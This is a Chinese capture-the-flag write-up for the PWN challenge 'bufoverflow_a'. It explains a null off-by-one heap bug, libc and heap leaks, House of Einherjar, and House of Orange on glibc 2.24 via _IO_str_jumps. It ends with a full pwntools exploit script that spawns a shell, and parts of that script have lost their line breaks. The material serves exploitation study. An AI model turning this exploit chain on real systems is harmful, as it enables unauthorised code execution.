攻防世界PWN之bufoverflow_a题解(house of orange in 2.24house of Einherjar)

本文主要是介绍攻防世界PWN之bufoverflow_a题解(house of orange in 2.24house of Einherjar)，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

bufoverflow_a

首先，我们检查一下程序的保护机制

然后，我们用IDA分析一下，是一个经典的增删改查的程序，然后我们看到创建堆时，前两个堆是用malloc创建，后面的堆用calloc创建，这意味着，如果要泄露libc地址，只能靠前两个堆，后面的堆从bin里取出后会清空里面的信息。

Fill功能存在一个null off by one漏洞

我们每次只能对最后创建的那个堆进行读写操作

并且delete以后，指针将清空，就无法进行读写操作，除非重新创建一个堆。

首先是泄露libc地址，这个很容易，创建一个unsorted bin范围的堆，然后后面再创建一个堆用来隔离，释放后再申请回来显示，即可泄露。

#0
create(0x80)
#1
create(0x80)
delete(0)
delete(1)
#0申请回来，此时保留了libc指针
create(0x80)
show()

接下来，我们要泄露堆地址，我们创建large bin范围的堆释放后申请一个比它还大的堆，使得它被放入large bin，从而堆上保留了堆指针，再申请回来。但是堆地址保存在fd_nextsize处，位于chunk_addr + 0x10处，我们如果直接显示，只能显示出fd的内容，因为后面有’\x00’结束了。并且，我们也不能利用fill来填充到fd_nextsize处，因为用fill，内容的最后会添加一个’\x00’

这样，我们仍然不能显示出fd_nextsize的内容。

#1
create(0x400) #large bin范围的堆释放后会有堆地址
create(0x80) #2
#将1放入unsorted bin
delete(1)
#触发整理unsorted bin，将1放入large bin，从而1里堆有指针
create(0x500) #1
delete(1)

目前，堆的布局是这样的

堆编号	大小	状态
0	0x90	used
1	0x410	free
2	0x90	used
Top chunk

在chunk1的数据域+0x10处，有堆指针。我们可以先释放chunk2，使得chunk1和2合并到top chunk，这样，堆布局变成了这样，但是里面的信息仍然没有清空。

堆编号	大小	状态
0	0x90	used
Top chunk

然后，我们继续释放chunk0，此时堆布局就只剩下一个TOP chunk

堆编号	大小	状态
Top chunk

接下来，我们申请一个0xA0大小的堆(数据域大小0x90)。因为bin里面没有合适的chunk，就从TOP chunk里划分，堆布局变成这样

堆编号	大小	状态
0	0xA0	used
Top chunk

然后，我们继续申请一个堆，大小任意，比如0x90

此时堆布局变成这样

堆编号	大小	状态
0	0xA0	used
1	0x90	used
Top chunk

由于chunk0大小为0xA0，比原先大了0x10，那么chunk1就会向后偏移0x10，也就是原来chunk1的fd_nextsize位置是现在chunk1的fd位置，这样，我们显示，就能泄露出堆地址了。

#释放堆2,由于堆2下面是top块，堆2上面的堆1也是free状态，那么就和全部合并到top块里，但里面的指针信息仍然有保留。
delete(2)
#此时，堆0下面的堆1是top块，释放0后，堆0也合并到了top块里。
delete(0)
#所有bin都合并了，只剩下一个top块
#错位0x10,使得接下来1的fd位置正好有堆指针
create(0x90) #0
create(0x80) #1
show()
sh.recv(1)
heap_base = u64(sh.recvuntil('\n',drop = True).ljust(8,'\x00')) - 0xB0
print 'heap_base=',hex(heap_base)
#============================================
delete(0)
delete(1)

我们泄露完信息后，又重新把0和1给释放了，使得他们重新合并到top chunk里。因为我们不需要再用它们了。并且由于只有前两个堆使用malloc分配，后面的用calloc分配，为了后续利用，我们要腾出位置。

接下来，我们就要伪造堆了。我们最终的目的是要构造出这样的堆布局

Unsorted bin1

Unsorted bin2

这样，我们就能从unsorted bin1里申请合适的堆，控制unsorted bin2，从而利用house of orange来getshell。

那么，我们就先来伪造chunk

#0
create(0x208)
fake_chunk = 'a'*0x20
fake_chunk += p64(0) + p64(0x1E1)
#让fd=bk=p绕过检查
fake_chunk += p64(heap_base + 0x50)*2
fake_chunk = fake_chunk.ljust(0x200,'a')
fake_chunk += p64(0x1E0)
fill(fake_chunk)
#1
create(0x80)
#2注意，2必须为0xF0，这样实际为0x100，off by null one后大小仍为0x100，与top chunk相邻，才能合并到top chunk
#因此不能在2末尾伪造fake_chunk
create(0xF0)
fill('b'*0xF0)
delete(1)
#1
create(0x88)
fill('b'*0x80 + p64(0x270))
#合并
delete(2)

需要注意的是，以前，为了绕过glibc中的检查

if (__builtin_expect (FD->bk != P || BK->fd != P, 0))
malloc_printerr ("corrupted double-linked list");

我们这样操作的

p->fd = &p-3*4
p->bk = &p-2*4

但是，现在我们没有办法满足这个条件，我们直接这样

p->fd = p
p->bk = p

还有就是，我们的chunk2，包括头结构的总大小为0x100，不能再多也不能再少。

因为null off by one，可以将下一个chunk的size低一字节覆盖为0，因此，size必须大于1字节。但是如果size大于0x100，这意味着，覆盖以后，这个chunk变小了，我们还需在这个chunk的末尾伪造一个填充chunk。这样会使得待会利用时,由于有填充chunk把它与top chunk隔离，使得它不与top chunk合并。而我们的目的是要把fake_chunk合并到top chunk里，这样我们就能构造出包含的unsorted bin。

经过这样的操作，我们的堆布局变成这样

堆编号		大小	状态
0		0x210	used
	Top chunk
1		0x90	used
2		0x100	free

着色区域全都在top chunk里面，现在，我们就可以来构造两个包含的unsorted bin。

我们先来构造0和1构成的unsorted bin，为了能够顺利delete掉0和1，我们需要复原1和2的头结构相关信息。

####注意
create(0x290) #2
#重新复原1、2堆的头信息
fill('a'*0x1D0 + p64(0) + p64(0x91) + 'a'*0x80 + p64(0) + p64(0x101) + '\n')
#为了delete后我们的内容不被清空或填充，
#我们需要把chunk1也给剔除，这样我们后面申请的时候，才不会被mallocopt设置free后的填充物
#注意顺序！！！
delete(1)
delete(0)

由于top chunk在fake_chunk处，因此，我们申请时，从top chunk里切割就是从fake_chunk处开始切割。这样，我们就得到了最外层的unsorted bin。

然后，我们要开始构造内层的unsorted bin，那么我们需要释放fake_chunk。而fake_chunk此时位于index 2。接下来，我们申请堆，肯定会从我们辛苦得到的外层unsorted bin里切割，没关系，待会用完重新释放回去。在程序中的堆指针数组中下标2的地方保存着fake_chunk的地址，我们现在的目的是要成功释放fake_chunk2。但是，fake_chunk前后的chunk头信息已经被打乱，我们不能直接释放。

我们可以从外层unsorted bin里申请一个大点的堆，然后，我们要在这个堆里重新伪造fake_chunk，已经一个填充chunk，由于绕过检查。也就是说，我们要在原来的fake_chunk里面末尾腾出一点位置，制造一个填充chunk，就可以绕过检查了。

#重新从外层的unsorted bin切割一块空间
create(0x290) #0
#在fake_chunk里腾出位置伪造填充块，而这个chunk0末尾也要放一个填充块绕过检查
#也就是总共要伪造三个chunk，总大小要等于这个chunk0的大小，即0x290
fill('a'*0x20 + p64(0) + p64(0x91) + 'a'*0x80 + p64(0) + p64(0x151) + '\n')
delete(0) #得到外层unsorted bin
delete(2) #得到内层unsorted bin
create(0x290)
#现在，我们已经可以控制unsorted bin了

这样，我们就控制了内层的unsorted bin。那么我们就可以利用house of orange了。

本题，提供的libc版本是2.24，因此增加了对vtable的检查。

IO_validate_vtable (const struct _IO_jump_t *vtable)
{
/* Fast path: The vtable pointer is within the __libc_IO_vtables
section. */
uintptr_t section_length = __stop___libc_IO_vtables - __start___libc_IO_vtables;
const char *ptr = (const char *) vtable;
uintptr_t offset = ptr - __start___libc_IO_vtables;
if (__glibc_unlikely (offset >= section_length))
/* The vtable pointer is not in the expected section. Use the
slow path, which will terminate the process if necessary. */
_IO_vtable_check ();
return vtable;
}

也就是vtable指针必须在__stop___IO_vtables 和 __start___libc_IO_vtables范围之内。因此，我们可以利用__IO_str_jumps来绕过

{
JUMP_INIT_DUMMY,
JUMP_INIT(finish, _IO_str_finish),
JUMP_INIT(overflow, _IO_str_overflow),
JUMP_INIT(underflow, _IO_str_underflow),
JUMP_INIT(uflow, _IO_default_uflow),
JUMP_INIT(pbackfail, _IO_str_pbackfail),
JUMP_INIT(xsputn, _IO_default_xsputn),
JUMP_INIT(xsgetn, _IO_default_xsgetn),
JUMP_INIT(seekoff, _IO_str_seekoff),
JUMP_INIT(seekpos, _IO_default_seekpos),
JUMP_INIT(setbuf, _IO_default_setbuf),
JUMP_INIT(sync, _IO_default_sync),
JUMP_INIT(doallocate, _IO_default_doallocate),
JUMP_INIT(read, _IO_default_read),
JUMP_INIT(write, _IO_default_write),
JUMP_INIT(seek, _IO_default_seek),
JUMP_INIT(close, _IO_default_close),
JUMP_INIT(stat, _IO_default_stat),
JUMP_INIT(showmanyc, _IO_default_showmanyc),
JUMP_INIT(imbue, _IO_default_imbue)
};

我们可以利用_IO_str_finish函数里的这个

_IO_str_finish (FILE *fp, int dummy)
{
if (fp->_IO_buf_base && !(fp->_flags & _IO_USER_BUF))
(((_IO_strfile *) fp)->_s._free_buffer) (fp->_IO_buf_base);
fp->_IO_buf_base = NULL;
_IO_default_finish (fp, 0);
}

我们把vtable指向__IO_str_jumps，把fp->_free_buffer指向system函数，把fp->_IO_buf_base指向/bin/sh字符串，再伪造其他字段，绕过检查，这样就能触发调用system(“/bin/sh”)了。同理_IO_str_overflow类似。

#house of orange in 2.24
fake_file = p64(0) + p64(0x60)
#unsorted bin attack，修改_IO_list_all为main_arena+88
fake_file += p64(0) + p64(_IO_list_all_addr-0x10)
#_IO_write_base < _IO_write_ptr
fake_file += p64(0) + p64(1)
#_IO_write_end 、IO_buf_base
fake_file += p64(0) + p64(binsh_addr)
fake_file = fake_file.ljust(0xD8,'\x00')
#vtable指针,同时，也作为fake_vtable的__dummy
fake_file += p64(_IO_str_jumps_addr - 8)
#__dummy2、__finish
fake_file += p64(0) + p64(system_addr)

如果没有getshell，是由于栈环境问题，多试几次就行了。

综上，我们的exp脚本

#coding:utf8
from pwn import *sh = process('./bufoverflow_a')
#sh = remote('111.198.29.45',34863)
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
#libc = ELF('./libc.so.6')
_IO_list_all_s = libc.symbols['_IO_list_all']
malloc_hook_s =  libc.symbols['__malloc_hook']
system_s = libc.sym['system']
binsh_s = libc.search('/bin/sh').next()def create(size):sh.sendlineafter('>>','1')sh.sendlineafter('Size:',str(size))def delete(index):sh.sendlineafter('>>','2')sh.sendlineafter('Index:',str(index))def fill(content):sh.sendlineafter('>>','3')sh.sendafter('Content:',content)def show():sh.sendlineafter('>>','4')def get_IO_str_jumps():IO_file_jumps_offset = libc.sym['_IO_file_jumps']IO_str_underflow_offset = libc.sym['_IO_str_underflow']for ref_offset in libc.search(p64(IO_str_underflow_offset)):possible_IO_str_jumps_offset = ref_offset - 0x20if possible_IO_str_jumps_offset > IO_file_jumps_offset:print possible_IO_str_jumps_offsetreturn possible_IO_str_jumps_offset
#==============泄露libc相关地址============
#0
create(0x80)
#1
create(0x80)
delete(0)
delete(1)
#0申请回来，此时保留了libc指针
create(0x80)
show()
sh.recv(1)
#泄露信息
main_arena_xx = u64(sh.recvuntil('\n',drop = True).ljust(8,'\x00'))
malloc_hook_addr = (main_arena_xx & 0xFFFFFFFFFFFFF000) +  (malloc_hook_s & 0XFFF)
libc_base = malloc_hook_addr - malloc_hook_s
_IO_list_all_addr = libc_base + _IO_list_all_s
_IO_str_jumps_addr = libc_base + get_IO_str_jumps()
system_addr = libc_base + system_s
binsh_addr = libc_base + binsh_s
print 'libc_base=',hex(libc_base)
print '_IO_list_all_addr=',hex(_IO_list_all_addr)
print 'system_addr=',hex(system_addr)
#===========泄露堆地址====================
#1
create(0x400) #large bin范围的堆释放后会有堆地址
create(0x80) #2
#将1放入unsorted bin
delete(1)
#触发整理unsorted bin，将1放入large bin，从而1里堆有指针
create(0x500) #1
delete(1)
#释放堆2,由于堆2下面是top块，堆2上面的堆1也是free状态，那么就和全部合并到top块里，但里面的指针信息仍然有保留。
delete(2)
#此时，堆0下面的堆1是top块，释放0后，堆0也合并到了top块里。
delete(0)
#所有bin都合并了，只剩下一个top块
#错位0x10,使得接下来1的fd位置正好有堆指针
create(0x90) #0
create(0x80) #1
show()
sh.recv(1)
heap_base = u64(sh.recvuntil('\n',drop = True).ljust(8,'\x00')) - 0xB0
print 'heap_base=',hex(heap_base)
#============================================
delete(0)
delete(1)
#0
create(0x208)
fake_chunk = 'a'*0x20
fake_chunk += p64(0) + p64(0x1E1)
#让fd=bk=p绕过检查
fake_chunk += p64(heap_base + 0x50)*2
fake_chunk = fake_chunk.ljust(0x200,'a')
fake_chunk += p64(0x1E0)
fill(fake_chunk)
#1
create(0x80)
#2注意，2必须为0xF0，这样实际为0x100，off by null one后大小仍为0x100，与top chunk相邻，才能合并到top chunk
#因此不能在2末尾伪造fake_chunk
create(0xF0)
fill('b'*0xF0)delete(1)
#1
create(0x88)
fill('b'*0x80 + p64(0x270))
#合并
delete(2)
####注意
create(0x290) #2
#重新复原1、2堆的头信息
fill('a'*0x1D0 + p64(0) + p64(0x91) + 'a'*0x80 + p64(0) + p64(0x101) + '\n')
#为了delete后我们的内容不被清空或填充，
#我们需要把chunk1也给剔除，这样我们后面申请的时候，才不会被mallocopt设置free后的填充物
#注意顺序！！！
delete(1)
delete(0)#重新从外层的unsorted bin切割一块空间
create(0x290) #0
#在fake_chunk里腾出位置伪造填充块，而这个chunk0末尾也要放一个填充块绕过检查
#也就是总共要伪造三个chunk，总大小要等于这个chunk0的大小，即0x290
fill('a'*0x20 + p64(0) + p64(0x91) + 'a'*0x80 + p64(0) + p64(0x151) + '\n')
delete(0) #得到外层unsorted bin
delete(2) #得到内层unsorted bin
create(0x290)
#现在，我们已经可以控制unsorted bin了
payload = 'a'*0x20
#house of orange in 2.24
fake_file = p64(0) + p64(0x60)
#unsorted bin attack，修改_IO_list_all为main_arena+88
fake_file += p64(0) + p64(_IO_list_all_addr-0x10)
#_IO_write_base < _IO_write_ptr
fake_file += p64(0) + p64(1)
#_IO_write_end 、IO_buf_base
fake_file += p64(0) + p64(binsh_addr)
fake_file = fake_file.ljust(0xD8,'\x00')
#vtable指针,同时，也作为fake_vtable的__dummy
fake_file += p64(_IO_str_jumps_addr - 8)
#__dummy2、__finish
fake_file += p64(0) + p64(system_addr)
payload += fake_file
payload += '\n'
fill(payload)
#getshell
create(0x80)sh.interactive()

这篇关于攻防世界PWN之bufoverflow_a题解(house of orange in 2.24house of Einherjar)的文章就介绍到这儿，希望我们推荐的文章对编程师们有所帮助！